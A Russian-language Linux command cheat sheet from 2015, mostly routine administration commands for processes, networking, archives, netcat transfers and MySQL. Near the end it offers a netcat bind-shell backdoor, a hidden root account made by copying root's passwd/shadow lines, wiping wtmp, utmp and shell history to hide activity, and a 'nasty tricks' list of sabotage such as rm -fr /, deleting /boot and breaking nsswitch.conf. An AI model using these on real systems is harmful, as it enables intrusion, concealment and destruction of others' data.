21.04.2015

linux nix tools

Команды *nix и примеры их применения
______________________________________________________________

СИСТЕМА
cat /etc/issue - как узнать версию debian\ubuntu
lsb_release -a - как узнать версию debian\ubuntu
cat /etc/lsb-release -как узнать версию debian\ubuntu
cat /etc/debian_version - как узнать версию debian\ubuntu
ps -uax - посмотреть процессы
ps -uaxf - посмотреть процессы
ps -eafw - отобразить запущенные процессы, используемые ими ресурсы и другую полезную информацию
ps axjf - Процессы как дерево процессов
ps aux | grep 'ss[h]' - Найти все ssh pids без grep pid
pstree - отобразить дерево процессов
killall 0 httpd - Выводит на экран текущее состояние процесса httpd?!1
kill -9 98989 - "убить" процесс с PID 98989 "на смерть" (без соблюдения целостности данных)
kill -KILL 98989 - "убить" процесс с PID 98989 "на смерть" (без соблюдения целостности данных)
killall -9 name - убить процесс и все что с ним связано
useradd -m -d /etc/var/www -s /bin/bash -u 1223 userwww -создать пользователя userwww с домашним каталогом www и шелом bash
usermod -s /bin/sh user - назначить user шелл sh
userdel -rf user - удалить пользователя user вместе с его каталогом
groupdel groupgg  - удалить группу groupgg
groupadd groupgg - добавить  группу groupgg
gpasswd -a user2 groupgg - добавить пользователя user2 в группу groupgg
id - узнать свой id
id user - узнать id пользователя user
getent passwd - как посмотреть всех пользователей
w - кто сейчас из пользователей в системе
who - кто сейчас из пользователей в системе
fuser -va /dev/tty - включить подробные сообщения и показать кто обращается к файлу
fuser -k /dev/tty1 - завершить процессы обращающиеся к  этому файлу
fuser -l /dev/tty1 - показать доступные имена сигналов
fuser -va 22/tcp - Процессы использующие порт 22
fuser -va /home  - Процессы работающие с разделом /home
uname -r - показать ядро системы
lsusb -t - показать доступные usb устройства
dmesg |less  - все о загрузке системы и ее устройств с временными метками (/var/log/dmesg)
lsmod - покажет загруженные модули ядра
modinfo e1000 - посмотреть информацию об модуле ядра
modprobe - программа для подключения и отключения модулей ядра
rcconf - управление демонами
sys-rc-conf - управление демонами
update-rc.d -для создания ссылок загрузки. Runlevel 3 - загрузка без иксов. Runlevel 5 - загрузка с иксами
dpkg-reconfigure tzdata изменить временную зону
date --set xx:xx установить время
date 041217002007.00* - установить системные дату и время ММДДЧЧммГГГГ.СС (МесяцДеньЧасМинутыГод.Секунды)
date -R  - Проверить текущее время и часовой пояс
clock -w - сохранить системное время в BIOS
grep MemTotal /proc/meminfo - Информация о RAM
free -m - Используемая и свободная оперативная память (-m for MB)
top - Статистика процессов cpu
htop - Текущее состояние системы
iotop - Анализа потребления дисковой полосы
atop - Статистика загрузки cpu, блочных устройств, сетевых интерфейсов
iftop - Наблюдение за трафиком в реальном времени (сеть)
powertop - Показывает время, затраченное на обслуживание процессором
dnstop - Анализатор DNS-трафика на интерфейсе
iptstate  - Монитор contrack из iptables, показывает активные трансляции с возможностью их убить
mpstat 1 - Статистика загрузки процессора
vmstat 2  - статистика использования виртуальной памяти
iostat 2  - Статистика I/O (2 s интервал)
tail -n 500 /var/log/messages - Последние 500 kernel/syslog сообщений
tail /var/log/warn - Предупреждения об ошибках, см. syslog.conf
pgrep -l sshd - Найти PIDs процессов по имени (части имени)
echo $$ - PID нашего shell
pmap PID  - Карта памяти процесса (поиск утечки памяти), используемые библиотеки
mount | column -t  - Смонтированные файловые системы
df - Свободное пространство на дисках
cat /proc/partitions - Все зарегистрированные разделы (Linux)
______________________________________________________________

Top, htop
Top - выводит информацию в реальном времени о запущенных процессах.
Htop - продвинутая версия top, ставится из репозиториев.
<u> [username] Показывает процессы принадлежащие пользователю username
<k> [pid] Убить процесс с pid
<1> Покажет статистику использования процессоров
<R> Сортировка
______________________________________________________________

Kill, signals
ping -i 60 ya.ru > ping_ya.ru.log &   (создали процесс с пидом [1] 4712)
kill -s TERM 4712 - также kill -15 4712
killall -1 httpd - Завершить HUP процесс по имени
pkill -9 http - Завершить TERM процесс по имени (части имени)
pkill -TERM -u www - Завершить TERM процессы принадлежащие www
fuser -k -TERM -m /home - Завершить все процессы использующие /home (для umount)
Сигналы:
-1     HUP - Дать отбой, перегрузка конфигурационных файлов и перезапуск программы
-2     INT - Прервать
-3     QUIT - Выйти
-9     KILL - Прекратить все выполняющиеся действия и завершить работу
-15    TERM - Мягкое завершение с удаление порожденных процессов и закрытием файлов
______________________________________________________________

Ограничения shell/script
ulimit -a - Смотрим ограничения
ulimit -n 10240 - Меняем ограничение на количество открытых файлов, только shell

______________________________________________________________

Ограничения user/process
cat /etc/security/limits.conf
*   hard    nproc   250 - Ограничения пользовательских процессов
asterisk hard nofile 409600 - Ограничения на открытые файлы приложения
______________________________________________________________

Ограничения на всю систему
sysctl -a - Смотрим системные ограничения
sysctl fs.file-max - Максимальное количество открытых файлов
sysctl fs.file-max=102400 - Меняем максимальное количества открытых файлов
echo "1024 50000" > /proc/sys/net/ipv4/ip_local_port_range - диапазон портов
cat /etc/sysctl.conf
fs.file-max=102400  - Ввод по умолчанию sysctl.conf
cat /proc/sys/fs/file-nr - Сколько дескрипторов файлов используется
______________________________________________________________

gpg --keyserver wwwkeys.us.pgp.net --recv-keys ключ
gpg --armor --export ключ | apt-key add -
apt-get update
______________________________________________________________

dpkg - l -получить список установленных пакетов
dpkg -i namepacket (-i install)
dpkg -r -P namepaket (-r remove -P purge)
______________________________________________________________

apt-get install --reinstall proga -переустановка программы
apt-get remove --purge proga -удаление месте с конфигурациями
apt-cache show пакет -показывает сводку на указанный пакет
apt-get check -проверяет состояние зависимостей в системе.
apt-get -f install -Попытка привести систему в замкнутый, логичный вид
apt-get dist-upgrade -модернизировать систему
______________________________________________________________

hdparm -I /dev/sda - Информация о IDE/ATA (Linux)
fdisk /dev/ad2  - Работа с таблицей разделов
smartctl -a /dev/ad2 - Отобразить информацию SMART
smartctl -A /dev/hda - S.M.A.R.T smartmontools -нужен пакет (еще есть gsmartcontrol+smartmontools+libatasmart)
hdparm -i /dev/sda - вывести характеристики жесткого диска серийный номер диска и тд
hdparm -t /dev/sda - протестировать производительность чтения данных с жесткого диска
hdparm -tT /dev/sda - протестировать производительность чтения данных с жесткого диска
hdparm -d 1 /dev/hdX - проверить режим дма (ускорит работу харда)
hdparm -k 1 /dev/hdX - задать режим дма (ускорит работу харда)
touch -t 0712250000 fileditest - поменять дату файла fileditest
tail -f /var/log/messages - следим за логами системы
cat /var/lib/dhcp/dhcpd.leases -посмотреть какие адреса раздал dhcpd (DHCP сервер)
cat /proc/net/dev - сеть какие пакеты передаются
______________________________________________________________

Производительность дисков
time dd if=/dev/ad4s3c of=/dev/null bs=1024k count=1000
time dd if=/dev/zero bs=1024k count=1000 of=/home/1Gb.file - Читаем и пишим 1GB в /home (/dev/ad4s3c)
hdparm -tT /dev/hda - протестировать производительность чтения данных с жесткого диска

______________________________________________________________

СЕТЬ
trafshow посмотреть активность сети
ss -s Мониторинг сетевых соединений. похожа на netstat
ss -l Информация об ожидающих соединений сокетах
ss -lp Информация об ожидающих соединений сокетах, а также именах процессов, их использующих
ss -at Информация обо всех задействованных TCP сокетах
ss -au Информация обо всех задействованных UDP сокетах
ss -o state established '( dport = :smtp or sport = :smtp )' Информация обо всех установленных SMTP-соединениях
ss -o state established '( dport = :http or sport = :http )' Информация обо всех установленных HTTP-соединениях:
ss -x src /tmp/.X11-unix/* Локальные процессы, подключённые к X-серверу:
ss -o state fin-wait-1 '( sport = :http or sport = :https )' dst 202.54.1/24 TCP-сокеты, находящиеся в состоянии FIN-WAIT-1 для соединений из подсети
nmap -v -A 192.168.0.101
nmap -v -sP 192.168.0.101/24
nmap -O target.host.com
nmap -vv host.target.com
nmap -sP 192.168.1.0/24 - Узнать занятые IP в сети 1.0/24 (IP, MAC, hostname)
nmap -sS -sV -O tager.ru - Скрытое SYN сканирование с определением типа и версии ОС
nmap -sX -p 22 192.168.10.10-250 -oN /data/host.txt  - Сканирование машин с ip от 10 по 250  и запись резултата
netstat -nt
netstat -nlp |grep :25
netstat -i
netstat -apn --inet
netstat -ltpn --inet
netstat -tuep информация кто использует TCP и UDP (а также процесс и только для установленных соединений)
lsof -i udp информация кто использует UDP
lsof -i :22 информация кто использует 22 порт
route -n (p - serveces t - tcp ip l - udp)
ifconfig eth0 inet 192.168.0.78/24
route add default gw 192.168.0.1
route add -net 192.168.0.0 netmask 255.255.0.0 gw 192.168.1.1
route del -net 192.168.0.0 netmask 255.255.255.0 eth0
echo 1 > /proc/sys/net/ipv4/ip_forward
tcpdump -i eth0
tcpdump -n -i eth0 ether host mac
tcpdump -nl -i eth0 not port ssh and src \(192.168.1.10 or 192.168.1.15\)
tcpdump -n -i eth0 net 192.168.1.15  - трафик с/на IP
tcpdump -n -i eth0 net 192.168.1.0/24  - трафик с/в сеть
tcpdump -l > dump && tail -f dump  - Вывод с записью в файл
tcpdump -i eth0 -w traffic.eth0  - Информация о трафике записывается в бинарный файл traffic.eth0
tcpdump -i eth0 -s 0 -w traffic.eth0 - Запись + загрузка в бинарник
tcpdump -r traffic.eth0  - Читаем из файла
tcpdump port 80  - Весь трафик на 80 порт и ответы
tcpdump host google.com - Весь с/на google.com
tcpdump -i eth0 -X port \(110 or 143\) - Проверка pop и imap на безопасность
tcpdump -n -i eth0 icmp - Ловим pings
tcpdump -i eth0 -s 0 -A port 80 | grep GET - (-s 0 весь пакет, -A для ASCII)
ethtool -s eth0 speed 1000 duplex full autoneg off
iperf -s 127.0.0.1 поднять сервер для теста скорости
iperf -s -p 8080 поднять сервер для теста скорости
iperf -c 192.168.13.243 проверить скорость
iperf -c 172.16.12.1 -p 8080 -t 180 проверить скорость
host ya.ru
arping 192.168.0.1
arping -i eth0 f0:7d:68:95:f1:c8
ping 192.168.0.1
tracepath -n ya.ru
traceroute -ln ya.ru (как в винде покажит)
xfreerdp -k en_us -f -u user -p password server (RDP client)
______________________________________________________________

Отключаем ответы сервера на ping
sysctl net.ipv4.icmp_echo_ignore_all
sysctl -w net.ipv4.icmp_echo_ignore_all=1 - отключаем ответ на ping
чтоб сохранялось при перегрузке
nano /etc/sysctl.conf - проверяем значение
net.ipv4.icmp_echo_ignore_all=1 - выставляем 1 и сохраняем
______________________________________________________________

ФАЙЛЫ
sync -заставит записать на диск сразу
iotop - дисковая активность
______________________________________________________________

Поиск текста и файлов.
grep -Ev "^#|^$" - покажет файл без комментариев
grep -Ev "^#|^$" filename > filename.txt - вот так можно вырезать комментарии
grep -rnw function_name /myprogram/1/ - пищит в каталоге /myprogram/1/ фразу function_name и покажет номер строки этой фразы
grep -w needle haystack.txt - поиск слова
grep slovoichu /gde/icllly.txt - поиск слова
find -name "*.txt" - найти все файлы в названиях которых есть .txt
find /root -name "*.txt" -exec grep -H "123" "{}" \; - найти в каталоге /root все файлы .txt и показать файл в котором есть текст 123
find . -type d -exec chmod 755 {} \; найти все директории и дать пров 755
find . -type f -exec chmod 644 {} \; найти все файлы и дать прова 644
______________________________________________________________

Архивы
tar cf back.tar /home/user запаковка Z-tar.Z z-tar.gz j-tar.bz2
tar tf back.tar проверка
tar xf back.tar распаковка
tar tfv viruses-2010-05-18.tar.bz2 1>zxcvirus.txt просмотр архива и запись в файл описания
______________________________________________________________

Пример архивирования и восстановления
tar cvzpf /home/Backup`date +%y_%m_%d`.tgz --same-owner --exclude=/home/Backup.tgz --exclude=/home/error.log --exclude=/proc/* --exclude=/media/* --exclude=/dev/* --exclude=/mnt/* --exclude=/sys/* --exclude=/tmp/* / 2>/home/error.log
tar cvzpf /home/Backup-etc`date +%y_%m_%d`.tgz /etc 2>/home/error.log
tar xvzf /home/Backup.tgz -C / восстановление

______________________________________________________________

Клонирование
dd if=/dev/sda of=/dev/sdb bs=16M (if что of куда bs размер блока count сколько раз записывать)
dd if=/dev/sda of=/zxc/mbr.back bs=512 count=1 (backup mbr)
dd if=/zxc/mbr.back of=/dev/sda bs=512 count=1 (восстановления из backup)
______________________________________________________________

dd if=/dev/hdc of=/tmp/mycd.iso bs=2048 conv=notrunc - Создание ISO образа
Используем mkisofs для создания CD/DVD образа из файлов в папке.
Для преодоления ограничений на имена файлов:
-r разрешает Rock Ridge расширения для UNIX истем,
-J разрешает Joliet расширения используемые Microsoft ОС.
-L разрешает имена согласно ISO9660.
mkisofs -J -L -r -V TITLE -o imagefile.iso /path/to/dir

cdrecord -scanbus - Находим устройство для записи (1,0,0)
cdrecord dev=1,0,0 imagefile.iso - Запись
cdrecord dev=ATAPI -scanbus        # Можно использовать native ATAPI

dd bs=1k if=imagefile.nrg of=imagefile.iso skip=300 -Конвертируем Nero .nrg файл в .iso
Nero просто добавляет 300Kb заголовок к нормальному iso

mount -o loop disk.iso /zzz - монтирование iso образа
______________________________________________________________

Синхронизация каталогов
rsync -a /dir1/dir2 /dir3 - будет создана иерархия /dir3/dir2/файлы
rsync -a /dir1/dir2/ /dir3 - будет создана иерархия /dir3/файлы
rsync -a $srv/ $srv:src
______________________________________________________________

Синхронизация каталогов ssh+rsync
rsync -avz --delete -e ssh логин@удалённый.хост:путь/откуда/ путь/куда   -изменяется удалённый каталог, копируем его на локальную машину
rsync -avz --delete -e ssh путь/откуда/ логин@удалённый.хост:путь/куда   -изменяется локальный каталог, копируем его на удаленную машину
______________________________________________________________

Синхронизация каталогов ftp
lftp -e 'mirror -e каталог-на-сервере локальный-каталог; bye;' -u логин,пароль удалённый.хост - синхронизировать локальный каталог с удалённым
lftp -e 'mirror -R локальный-каталог каталог-на-сервере; bye;' -u логин,пароль удалённый.хост - выложить локальный каталог на удалённый сервер

______________________________________________________________

vimtutor - программа для обучающая работе в vi
fdisk -l - показать доступные диски и разделы
du -h - показать занятое место в текущем каталоге
df -h - показать занятое место на  всех дисках
df - Показать свободное пространство на дисках и смонтированные устройства
du -sh * - Размер каталога (листинг файлов и подкаталогов)
du -csh - Размер текущей директории
du -ks * | sort -n -r - Сортировать по размеру (kbytes)
ls -lSr - Показать файлы с сортировкой по размеру
wc -l filename - посчитать количество строк в файле
touch  lol{1,2,3}.txt - создать пустые файлы lol1.txt lol2.txt lol3.txt
mkdir -p lol{1,2,3} - создать каталоги lol1 lol2 lol3
mkdir -p /root/hhh m{zxc1,zxc2,zxc3} - создать каталог /root/hhh и в нем каталоги mzxc1 nzxc2 mzxc3
mkdir -p /root/hhh/{zxc1,zxc2,zxc3} - создать каталог /root/hhh и в нем каталоги zxc1 zxc2 zxc3
dd if=/dev/zero of=filemy bs=10M count=1 - создать filemy размером 10Мб
split -b 1M filemy - разбить filemy на части размером 1 Мб с помощью опции -b
split -n 3 filemy - разрезание filemy на три части
head -n 23
tail -n 23
tail -n0 -f /var/log/syslog
cut
sort
cat
less
cp file1 file2
cp file1 file2 dir
cp (x*~x[3-5]) newdir - скопировать все файлы вида x* кроме x3 по x5
cp *(^m0) newdir - скопировать файлы модифицированные не сегодня
2>stderr
1>stdout
0>stdin

______________________________________________________________

vi Минимальный набор команд:

dd — удалить строку;
5dd — удалить 5 строк;
<esc>:x — выход с сохранением;
<esc>:q! — выход без сохранения изменений.
i — перейти в режим вставки;
a — перейти в режим вставки со следующего символа;
<esc> — выход из режима редактирования.

______________________________________________________________

nano - редактор файлов, более дружелюбный чем vim ;)
# nano /etc/hosts                          # просмотр и релактирование файла
# export EDITOR=nano                       # делаем nano редактором файлов по умолчанию
 Ctrl-X - закрыть редактор
 Ctrl-O - сохранить
 Ctrl-C - номер строки\текущая позиция
 Ctrl-W - поиск
 Ctrl-W затем Ctrl-T - переход к строке №
 Ctrl-K - вырезать строку
 Ctrl-U - вставить из буфера
 Alt-A - выделение (вне X)
 Alt-6 - копировать в буфер

______________________________________________________________

Использование числовых суффиксов
Команда split позволяет создавать файлы с числовыми суффиксами вместо символьных.
Приведенная ниже команда создает файл для каждого символа в строке "linuxcareer.com".
Секрет заключается в том, что мы разрезаем файл, задавая размер части в байтах, а 1 байт эквивалентен 1 символу.
Также вместо символьных мы используем числовые суффиксы:
ls
echo linuxcareer.com | split -b 1 -d
ls
x00  x01  x02  x03  x04  x05  x06  x07  x08  x09  x10  x11  x12  x13  x14  x15
cat *
linuxcareer.com
______________________________________________________________

Бесконечный цикл показывать время каждую секунду
#!/bin/bash
while :;do clear ;date ;sleep 1;done

______________________________________________________________

#!/bin/bash
while :
do
    echo "Press [CTRL+C] to stop.."
    sleep 1
done

______________________________________________________________

#!/bin/bash
while true
do
    echo "Press [CTRL+C] to stop.."
    sleep 1
done
______________________________________________________________

#!/bin/bash
# Purpose: Display various options to operator using menus
# Author: Vivek Gite < vivek @ nixcraft . com > under GPL v2.0+
# ---------------------------------------------------------------------------
# capture CTRL+C, CTRL+Z and quit singles using the trap
trap '' SIGINT
trap ''  SIGQUIT
trap '' SIGTSTP

# display message and pause
pause(){
    local m="$@"
    echo "$m"
    read -p "Press [Enter] key to continue..." key
}

# set an
while :
do
    # show menu
    clear
    echo "---------------------------------"
    echo "         M A I N - M E N U"
    echo "---------------------------------"
    echo "1. Show current date/time"
    echo "2. Show what users are doing"
    echo "3. Show top memory & cpu eating process"
    echo "4. Show network stats"
    echo "5. Exit"
    echo "---------------------------------"
    read -r -p "Enter your choice [1-5] : " c
    # take action
    case $c in
        1) pause "$(date)";;
        2) w| less;;
        3) echo '*** Top 10 Memory eating process:'; ps -auxf | sort -nr -k 4 | head -10;
           echo; echo '*** Top 10 CPU eating process:';ps -auxf | sort -nr -k 3 | head -10;
           echo;  pause;;
        4) netstat -s | less;;
        5) break;;
        *) Pause "Select between 1 to 5 only"
    esac
done
______________________________________________________________

ln -s /что "название линка" - нужно быть в той папке куда нужно сделать линк
rm /etc/udev/rules.d/70-pesistent-net.rules убить сетевушки и левые интерфесы
______________________________________________________________

mysqldump -u root -p -f mydatabase > /home/myname/mydatabasedump.sql - бэкап
mysql -u root -p -f mydatabase < /home/myname/mydatabasedump.sql -востоновление
mysql -uroot -p -логинемся для управления mysql
CREATE DATABASE <имя базы>; -создать базу
CREATE DATABASE db_name CHARACTER SET utf8 COLLATE utf8_general_ci; -создать базу + установить кодировку и тд
GRANT ALL PRIVILEGES ON db_name.* TO 'user_name'@'localhost' IDENTIFIED BY 'user_password'; -оздать нового пользователя и дать ему доступ к соответствующей базе
USE db_name; -Выбрать базу для работы
DROP DATABASE dbname; -Удалить базу данных
INSERT INTO comercial_tests (id, place_id, keywords) SELECT id, place_id, keywords FROM commercials; -Скопировать данные из одной таблицы в другую
SHOW databases; -Вывести список баз данных, к которым пользователь имеет доступ:
SHOW tables; -Вывести список таблиц, для текущей выбранной базы:
DESCRIBE pet; -Посмотреть поля таблицы
SELECT * FROM users LIMIT 5 OFFSET 5; -Посмотреть данные в таблице
CREATE TABLE pet (name VARCHAR(20), owner VARCHAR(20),species VARCHAR(20), sex CHAR(1), birth DATE, death DATE); -Создать таблицу
______________________________________________________________

ping6 -c4 -I eth0 ff02::1 узнать какие хосты могут использовать ipv6
ping6 ::1 пингануть локальный хост
::1 — это сокращение от 0000:0000:0000:0000:0000:0000:0000:0001. Любая непрерывная последовательность нулей может быть заменена на пару двоеточий, а любая четвёрка, состоящая из нулей, может быть заменена на один ноль
ssh phineas@fe80::221:97ff:feed:ef01%eth0
И опять же, если вы используете link-local адрес, то вы должны указать имя интерфейса с которого будете осуществлять подключение. Как показано выше, делается это путём добавления знака процента и имени интерфейса
ifconfig eth0 | grep "inet6 addr:" посмотреть адресс
ip -6 addr add 2001::1/64 dev eth0 назначить адресс
ip -6 addr del 2001::1/64 dev eth0 удалить адресс
# ip6tables -P OUTPUT DROP
# ip6tables -p INPUT DROP
# ip6tables -p FORWARD DROP
2001:db8:0000:0000:0000:0000:0000:0001
_____________|____|___________________
Network ID Subnet Interface ID

адреса из области 2001:0DB8::/32 предназначены для использования в экспериментах
sysctl -w net.ipv6.conf.all.forwarding=1 вкл маршрутизации ipv6
cat /proc/sys/net/ipv6/conf/eth0/forwarding проверка влючения маршруцизации ipv6

_____________________________________________________________

пример скрипта backup файлов
#!/bin/sh
tar -zcvpf /backup/backup-`date '+%d-%B-%Y'`.tar.gz --directory / \
--exclude=proc --exclude=var --exclude=mnt --exclude=usr --exclude=backup .
В данном примере сохраняются не отдельные директории, а корневая директория /, исключая /proc, /var, /mnt, /usr и, конечно, /backup. Также к имени файла добавляется дата создания резервной копии.

______________________________________________________________

wget -r -l 10 -k http://example.org/ Скопировать весь сайт целиком
wget --user=login --password=password ftp://ftp.example.org/some_file.iso спользование имени пользователя и пароля на FTP/HTTP
wget ftp://login:password@ftp.example.org/some_file.iso спользование имени пользователя и пароля на FTP/HTTP
wget --continue --recursive --level=1 http://www.vereskmed.ru/music/album_1/ Ну вот для примера простая команда для скачивания всего первого альбома группы "Вересковый мёд"
________________________________________________________________

zip -r -9 "название zip-архива" "имя файла или папки" "другие имена файлов или папок для добавления в архив, через пробел"
Используйте "-9" для максимальной степени сжатия (общий диапазон от 1 до 9).
Для создания zip-архива с одиночным файлом не используйте никаких опций, кроме степени сжатия.
unzip -распаковка
________________________________________________________________

где искать вредоносный код в linux
/var/at/tabs/<username>
/etc/ttys
/etc/profile
/etc/bashrc
/etc/csh.cshrc
/etc/csh.login
/etc/rc.common
~/.profile
~/.bashrc
______________________________________________________________

В OS X вредоносный код может скрываться здесь:
/System/Library/LaunchDaemons
/System/Library/Extensions
/Library/LaunchDaemons
/System/Library/LaunchAgents
/Library/LaunchAgents
/Library/StartupItems
/Library/Preferences/loginwindow.plist
~/Library/LaunchAgents
~/Library/Preference/loginitems.plist
~/Library/Preference/loginwindows.plist

Но это, скорее, касается зловреда, который работает в user mode. Изящно написанная малварь может сделать бэкдор прямо в ядре системы:
/System/Library/Caches/com.apple.kernelcaches
/System/Library/Filesystems/AppleShare/
/System/Library/Filesystems/hfs.fs/Encodings/
А еще более искусно созданные образцы задействуют расширения EFI (актуально для современных Mac'ов, построенных на платформе Intel).

_______________________________________________________________
Netcat (nc)
nc yandex.ru 80
HEAD / HTTP / 1.0
GET /HTTP /1.0
_______________________________________________________________

Netcat (nc) Передача файла
cat disk.iso | nc 127.0.0.1 5000 передача
nc -l 5000 > disk.iso прием
_______________________________________________________________

Netcat (nc) Передача папки
server# tar -cf - -C VIDEO_TS . | nc -l -p 4444 - Сделаем архив папки и прикрепим на 4444 порт
client# nc 192.168.1.1 4444 | tar xpf - -C VIDEO_TS - Получим файл с порта 4444 и распакуем
server# tar -czf - /etc/ | nc -l 3333 - Быстрый backup
client# nc 192.168.1.1 3333 | pv -b > mybackup.tar.gz
_______________________________________________________________

Netcat (nc) Передача файла
server# cat largefile | nc -l 5678 - Публикуем файл largefile на 5678 порт
client# nc 192.168.1.1 5678 > largefile - Принимаем файл с 5678 порта в новый файл largefile
server#cat backup.iso | pv -b | nc -l 3333 - Передаем файл с информацией о состоянии (прогресс)
client#nc 192.168.1.1 3333 | pv -b > backup.iso - Получаем файл с информацией о состоянии (прогресс)
_______________________________________________________________

Netcat (nc) Передача образа
server# dd if=/dev/sda0 | nc -l 4444  - Передаем образ раздела
client# nc 192.168.1.1 4444 | dd of=/dev/sda0 - Клонируем раздел
client# nc 192.168.1.1 4444 | dd of=sda0.img - или записываем образ в файл
server# dd if=/dev/hdb5 | gzip -9 | nc -l 3333
client# nc 192.168.1.1 3333 | pv -b > myhdb5partition.img.gz
_______________________________________________________________

Netcat (nc) Сканер портов
# nc -v -w 1 localhost -z 1-5901 |grep succeeded!
Connection to localhost 22 port [tcp/ssh] succeeded!
Connection to localhost 25 port [tcp/smtp] succeeded!
# nc -z 192.168.1.112 1-90
Connection to 192.168.1.112 22 port [tcp/ssh] succeeded!
Connection to 192.168.1.112 80 port [tcp/http] succeeded!
_______________________________________________________________

Netcat (nc) Чат
zabrosov# nc -lp 4444
boss    # nc 192.168.1.11 4444
_______________________________________________________________

Netcat (nc) Hacks
# nc -lp 4444 -e /bin/bash - Удаленный shell (server backdoor)
# nc -lp 4444 -e cmd.exe  - Удаленный shell для Windows; -e только для win ?
# webserver
# while true; do nc -l -p 80 < hohoho.html; done - Петля на 80 порту, отдаёт html страничку
_______________________________________________________________

# Бэкап по шифрованному туннелю, с автозакрытием в конце операции
server# cat backup.iso | nc -l 3333
client# ssh -f -L 23333:127.0.0.1:3333 hohoho@192.168.1.1 sleep 10; nc 127.0.0.1 23333 | pv -b > backup.iso

_______________________________________________________________

ssh user1@remote_server
scp -r file.txt user1@remote_server:~/ скопировать в домашнею директорию
_______________________________________________________________

/etc/udev/rules.d/70-persistent-net.rules - файл отвечает за автоматическое именование интерфейсов (удали избавишь себя от  лишних интерфейсов eth0-10)
______________________________________________________________

nano /etc/network/inerfaces
настройки интерфейса который получает интернет
allow-hotplug eth0 -автоматически определить интерфейс
iface eth0 inet static -статический IP адрес
address 192.168.3.112 -адрес интерфейса
netmask 255.255.255.0 -маска сети
gateway 192.168.3.1 -интернет
auto eth0

Настройка интерфейс который его раздает
iface eth1 inet static
address 192.168.15.1
netmask 255.255.255.0
auto eth1
_____________________________________________________________

Отключение ipv6
В файле /etc/sysctl.conf вставляем следующие строки -
#disable ipv6 settins
net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
net.ipv6.conf.lo.disable_ipv6 = 1
Сохраняем файл.
Применяем: sysctl -p

Отключение 6to4
netsh int 6to4 set st disabled
________________________________________________________________

T - Trancieve (отправление) tx передача
R - Recieve (получение) tx прием
com порт. Что такое Tx, Rx и Gnd ? = TX (передача, данные к телефону) = RX (прием, данные из телефона) , Gnd это масса (заземление).

________________________________________________________________

google.com "Таблица соответствий Windows и Linux программ"

________________________________________________________________

Мини тест хоста
nmap -P0 -p 1-65505 XXX.XXX.XXX.XXX (или хост) скан хоста
nmap -P0 -p 1-65505 127.0.0.1 скан локального хоста
netstat -anp | grep LISTEN | grep 665 кто слушает 665
lsof -i кто что слушает
netstat -nlpt кто что слушает
netstat -pantu кто что слушает
netstat -anp кто что слушает
etstats -tuep кто что слушает
cat /etc/passwd проверяем пользователей
________________________________________________________________

Как добавить юзера с правами root
будем редактировать файлы /etc/passwd и /etc/shadow каждое поле разделяется  (:) двоеточием.
    Редактируем  файл  /etc/passwd
копируем строку root:x:0:0:root:/root:/bin/bash и вставляем куда нить в середину во второй записи вместо root пишем свой желаемый логин
    Редактируем файл /etc/shadow
Копируем строку root:$pass:15295:0:99999:7:::
и вставляем куда нить в середину во второй записи вместо root пишем свой желаемый логин
после двоеточия (:) идет пароль его либо стираем либо пишем свой желаемый пароль
________________________________________________________________

Немного о логах (чистим логи)
редактируются обычным редактором
/var/log/messages - что делал юзер
/var/adm/messages -что делал юзер
/var/log  -демоны
редактируются командами
/var/log/wtmp -время сколько проработал юзер
/var/run/utmp -время сколько проработал юзер
вот такими командами
echo -ne > /var/log/wtmp
echo -ne > /var/run/utmp
.bash_history находиться в домашнем каталоге юзера
.mc/history находиться в домашнем каталоге юзера

________________________________________________________________

Гадости
самое тупое удаляем все rm -fr /
тупое  трем загрузчик  rm -fr /boot/*
chattr +i /bin защита от записи для root даже
файл /etc/nsswitch.conf стираем некоторые строки с files и db чувак долго будет думать чего у него нету инета

________________________________________________________________

apt-get remove mpt-status убираем ошибку на виртуалке связанную с raid

________________________________________________________________

md5 пароль 123456 http://www.miraclesalad.com/webtools/md5.php
MD5 Hash:
e10adc3949ba59abbe56e057f20f883e
_______________________________________________________________

Быстрая настройка сети
ifconfig eth0 inet 192.168.3.13/24
route add default gw 192.168.3.13
echo nameserver 192.168.3.1 > /etc/resolv.conf
_______________________________________________________________
Автозагрузка

# atostart 1
update-rc.d name1111 defaults -дабавить файл в авто загрузку /etc/init.d/*
update-rc.d [-n] [-f] имя remove
update-rc.d [-n] имя defaults [NN | SS KK]

# autostart 2
У нас есть скрипт, скажем /home/iptable.sh
Нужно добавить строку /home/iptable.sh в файл /etc/rc.d/rc.local

# autostart 3
пример автозагрузки скрипта от другого пользователя
cat /etc/rc.local
user=nameuser
program=/path/dir
su -m ${user} -c ${program}

# autostart 4
cat /home/dirscrit/myscript.pl
#!/bin/sh
/usr/bin/perl /home/dirscrit/myscript.pl
________________________________________________________________
Загрузачная флешка grub4dos

#из windows
1.форматнуть флешку в fat32
2.скопировать начинку
3. запустить bootice 0.9
4. выбрать нужный диск
5. install mbr > grub4dos
6. install pbr > grub4dos

#из linux
1.форматнуть флешку в fat32
2.скопировать начинку
3.сделать исполнительным chmod a+x bootlace.com
4. записать загрузчик ./bootlace.com /dev/sdb1

________________________________________________________________

Загрузка системы
Загрузившись, ядро стартует процесс init, который запускает rc, коорый в свою очередь выполняет все скрипты, соответствующего уровня запуска. Скрипты расположены в /etc/init.d и слинкованы в /etc/rc.d/rcN.d, где N, означает уровень запуска.
Уровень запуска по-умолчанию, установлен в /etc/inittab, и как правило имеет значение 3 или 5:
# grep default: /etc/inittab
id:3:initdefault:
Текущий режим работы может быть изменен с помощью все того-же init. Например, перейдем с 3 уровня на 5:
# init 5 # Переходим в режим 5
0       Shutdown and halt
1       Single-User mode (also S)
2       Multi-user without network
3       Multi-user with network
5       Multi-user with X
6       Reboot
Используйте chkconfig для конфигурирования программ, которые должны стартовать при загрузке в соответствующий режим.
# chkconfig --list # Список всех init-скриптов
# chkconfig --list sshd # Показать статус sshd
# chkconfig sshd --level 35 on # Конфигурирование sshd для уровня 3 и 5
# chkconfig sshd off # Отключение sshd для всех уровней
Debian и основанные на нем дистрибутивы, Ubuntu или Knoppix, для управления скриптами Runlevel, используют команду update-rc.d. По-умолчанию, 2,3,4 и 5 уровень для старта, и 0,1 и 6 для останова.
# update-rc.d sshd defaults # Активировать sshd с уровнем запуска по-умолчанию
# update-rc.d sshd start 20 2 3 4 5 . stop 20 0 1 6 . # Непосредственное указание уровней запуска и останова
# update-rc.d -f sshd remove # Запретить sshd для всех уровней
# shutdown -h now (or # poweroff) # Остановить и выключить систему

________________________________________________________________
fsboot Загрузка
FreeBSD и большинство Unixes
